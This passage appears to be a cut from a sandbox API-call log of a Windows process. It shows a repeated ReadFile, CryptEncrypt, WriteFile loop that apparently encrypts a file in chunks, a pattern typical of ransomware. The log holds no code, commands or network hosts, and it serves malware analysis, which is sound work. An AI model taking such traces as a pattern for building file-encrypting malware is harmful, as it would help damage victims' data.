Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x80) returned 1 [0242.278] CryptEncrypt (in: hKey=0x28e7d78, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28f4698*, pdwDataLen=0x2b9d1f4*=0x18, dwBufLen=0x80 | out: pbData=0x28f4698*, pdwDataLen=0x2b9d1f4*=0x80) returned 1 [0242.278] WriteFile (in: hFile=0x5d40, lpBuffer=0x28f4698*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x28f4698*, lpNumberOfBytesWritten=0x2b9d204*=0x80, lpOverlapped=0x0) returned 1 [0242.279] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.290] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.290] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.291] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.292] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.292] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.292] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.292] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.292] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.292] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.292] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.292] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.292] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.294] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.294] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.295] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.295] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.295] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.295] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.295] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.295] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.295] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.295] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.295] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.295] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.295] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.295] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.295] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.296] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.296] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.296] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.296] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.296] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.296] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.296] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.296] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.296] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.296] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.296] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.296] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.296] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.296] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.297] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.297] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.297] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.297] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.297] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.297] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.297] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.297] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.297] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.297] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.297] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.297] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.297] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.297] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.297] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.298] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.298] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.298] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.298] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.298] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.298] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.298] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.298] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.298] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.298] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.298] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.298] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.299] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.299] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.299] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.299] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.299] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.299] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.299] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.299] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.299] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.300] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.300] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.300] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.300] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.300] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.300] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.300] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.300] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.300] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.300] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.300] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.300] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.300] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.300] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.300] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.301] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.301] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.301] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.301] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.301] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.301] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.301] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, 